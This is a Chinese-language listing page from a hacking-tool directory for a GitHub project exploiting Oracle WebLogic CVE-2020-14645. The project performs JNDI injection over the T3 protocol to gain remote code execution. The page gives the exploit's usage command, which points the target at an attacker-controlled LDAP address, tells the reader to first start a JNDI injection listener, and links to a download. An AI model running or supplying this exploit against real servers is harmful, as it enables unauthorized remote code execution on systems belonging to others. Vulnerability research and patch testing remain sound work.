Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/daboquan/cve-2020-14645
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubdaboquan/cve-2020-14645

CVE-2020-14645

基于Java的漏洞利用工具,针对CVE-2020-14645,利用Oracle WebLogic T3协议进行JNDI注入,实现远程代码执行。

查看仓库
36年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-14645

使用方法

首先使用NDI-Injection-Exploit监听,并生成一个ldap地址。

java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]

-Tatget 和-RMI必填,https可使用--SSL参数,-Port默认7001。

自行编译需要添加coherence.jar和wlfullclient.jar

漏洞参考:

https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247484377&idx=1&sn=01d62d175127099275a243ab5fe02bc3&chksm=f9ee6f66ce99e670dbb6da2a3648ea5f6a91fa503441dccd903f44e76883019890d8a9701a29&scene=158#rd

代码参考:

https://github.com/Y4er/CVE-2020-2883

下载工具